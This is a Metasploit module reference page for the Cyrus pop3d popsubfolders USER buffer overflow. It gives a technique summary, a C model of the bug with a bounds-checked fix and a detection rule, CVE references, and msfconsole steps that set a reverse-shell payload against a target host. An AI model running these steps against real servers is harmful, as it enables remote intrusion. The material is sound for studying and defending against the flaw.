Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
This exploit takes advantage of a stack-based overflow. Once the stack corruption has occurred, it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write-anything-anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora Core 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement.
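The description above gives the shape of the bug: an unchecked copy of the USER argument into a fixed-size stack buffer overwrites a pointer that a later memcpy uses as its destination, and FORTIFY_SOURCE is the build-time check that stops the same copy on Fedora. The C program below is an added illustration written for this page; it is not Cyrus code and not part of the Metasploit module. MAILBOX_MAX, FRAME_SIZE, DEMO_DEST_PTR, LONG_USER and the POP3 sample lines are all constructed values. It models the vulnerable frame shape as a raw byte array (so the demonstration itself has no undefined behaviour), places the hardened copy that checks the argument length first beside it, and adds a small sensor check that flags oversized USER arguments in captured POP3 command lines.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sizes and values for the model; none of these are Cyrus's. */
#define MAILBOX_MAX   32u
#define FRAME_SIZE    (MAILBOX_MAX + sizeof(uintptr_t))
#define DEMO_DEST_PTR 0x1000UL
#define LONG_USER     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* 48 bytes */

/*
 * Model of the frame shape the description gives: a fixed buffer followed by
 * a pointer that a later memcpy() uses as its destination. The frame is one
 * byte array so the "overflow" stays inside it and the program stays defined;
 * in real code the same copy would run off the end of the buffer on the stack.
 * Returns the pointer value as the later memcpy() would see it.
 */
static uintptr_t copy_user_unchecked(const char *user, uintptr_t dest_ptr)
{
    unsigned char frame[FRAME_SIZE];
    size_t n = strlen(user);

    memcpy(frame + MAILBOX_MAX, &dest_ptr, sizeof dest_ptr); /* pointer sits past the buffer */
    if (n > FRAME_SIZE)
        n = FRAME_SIZE;               /* keeps the model defined; not a real bounds check */
    memcpy(frame, user, n);           /* BUG: length is never checked against MAILBOX_MAX */

    memcpy(&dest_ptr, frame + MAILBOX_MAX, sizeof dest_ptr);
    return dest_ptr;
}

/*
 * Hardened form: the argument is checked against the destination size,
 * including the terminating NUL, before a single byte is copied.
 * Returns 0 on success and -1 on rejection; `out` is untouched on rejection.
 */
static int copy_user_checked(const char *user, char *out, size_t out_size)
{
    size_t n = strlen(user);

    if (n >= out_size)
        return -1;
    memcpy(out, user, n + 1);
    return 0;
}

/* Convenience wrapper: does `user` fit the modelled mailbox buffer? */
static int user_fits_mailbox(const char *user)
{
    char out[MAILBOX_MAX];
    return copy_user_checked(user, out, sizeof out);
}

/*
 * Detection side: given one POP3 command line, return 1 if it is a USER
 * command whose argument would not fit a buffer of `limit` bytes. Meant for
 * a log or sensor rule where the buffer size is known from the build.
 */
static int user_arg_oversized(const char *line, size_t limit)
{
    if (strncmp(line, "USER ", 5) != 0)
        return 0;
    return strcspn(line + 5, "\r\n") >= limit;
}

int main(void)
{
    printf("pointer after normal USER:   %#lx\n",
           (unsigned long)copy_user_unchecked("alice", DEMO_DEST_PTR));
    printf("pointer after overlong USER: %#lx\n",
           (unsigned long)copy_user_unchecked(LONG_USER, DEMO_DEST_PTR));
    printf("checked copy accepts alice:  %d\n", user_fits_mailbox("alice"));
    printf("checked copy rejects long:   %d\n", user_fits_mailbox(LONG_USER));
    printf("sensor flags normal line:    %d\n",
           user_arg_oversized("USER alice\r\n", MAILBOX_MAX));
    printf("sensor flags long line:      %d\n",
           user_arg_oversized("USER " LONG_USER "\r\n", MAILBOX_MAX));
    return 0;
}
```

The unchecked copy returns the original pointer for a short name and a pointer made of the attacker's bytes for an overlong one, which is exactly the condition the description calls write-anything-anywhere; the checked copy and the sensor rule both turn on the same single fact, the argument length compared with the buffer size, which is also the comparison FORTIFY_SOURCE inserts at build time for fixed-size destinations.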
Exploit Rank
- Normal
Exploit Authors
- bannedit <bannedit [at] metasploit.com>
- jduck <jduck [at] metasploit.com>
Vulnerability References
- CVE-2006-2502
- OSVDB-25853
- BID-18056
- EDB-2053
- EDB-2185
- http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
Exploit Targets
- 0 - Gentoo 2006.0 Linux 2.6 (default)
Exploit Usage Information
$ msfconsole
[msfconsole ASCII banner]
msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders
msf exploit(cyrus_pop3d_popsubfolders) > show payloads
msf exploit(cyrus_pop3d_popsubfolders) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(cyrus_pop3d_popsubfolders) > set LHOST [MY IP ADDRESS]
msf exploit(cyrus_pop3d_popsubfolders) > set RHOST [TARGET IP]
msf exploit(cyrus_pop3d_popsubfolders) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| RHOST | The target address |
| RPORT | The target port (default: 110) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
